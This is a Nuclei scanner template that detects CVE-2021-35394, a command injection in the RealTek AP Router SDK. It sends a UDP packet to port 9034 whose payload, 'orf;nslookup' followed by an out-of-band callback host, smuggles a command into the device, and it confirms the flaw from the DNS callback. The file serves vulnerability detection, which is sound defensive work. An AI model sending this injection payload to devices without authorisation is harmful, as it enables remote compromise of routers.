Files
nuclei-templates/javascript/cves/2021/CVE-2021-35394.yaml
2025-11-19 05:10:58 +00:00

39 lines
1.3 KiB
YAML

id: CVE-2021-35394
info:
name: RealTek AP Router SDK - Arbitrary Command Injection
author: king-alexander
severity: critical
remediation: Apply the latest security patches or updates provided by RealTek.
description: The SDK exposes a UDP server that allows remote execution of arbitray commands.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-35394
- https://blogs.juniper.net/en-us/threat-research/realtek-cve-2021-35394-exploited-in-the-wild
classification:
epss-score: 0.91774
epss-percentile: 0.99755
tags: cve,cve2021,realtek,rce,kev,vkev,vuln
javascript:
- pre-condition: |
isUDPPortOpen(Host,Port);
code: |
let packet = bytes.NewBuffer();
let message = `orf;nslookup ${OAST}`
let data = message;
packet.WriteString(data)
let c = require("nuclei/net");
let conn = c.Open('udp', `${Host}:${Port}`);
conn.SendHex(packet.Hex());
args:
Host: "{{Host}}"
Port: 9034
OAST: "{{interactsh-url}}"
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
# digest: 4a0a00473045022100dcf2712aef2846533605cb5f3f59461f1e0bd5471463d96f46c4aa6a24068cf202206e155044280460c2f77de56c9eb48fe04fca2b1d4ead9032e17545548797221d:922c64590222798bb761d5b6d8e72950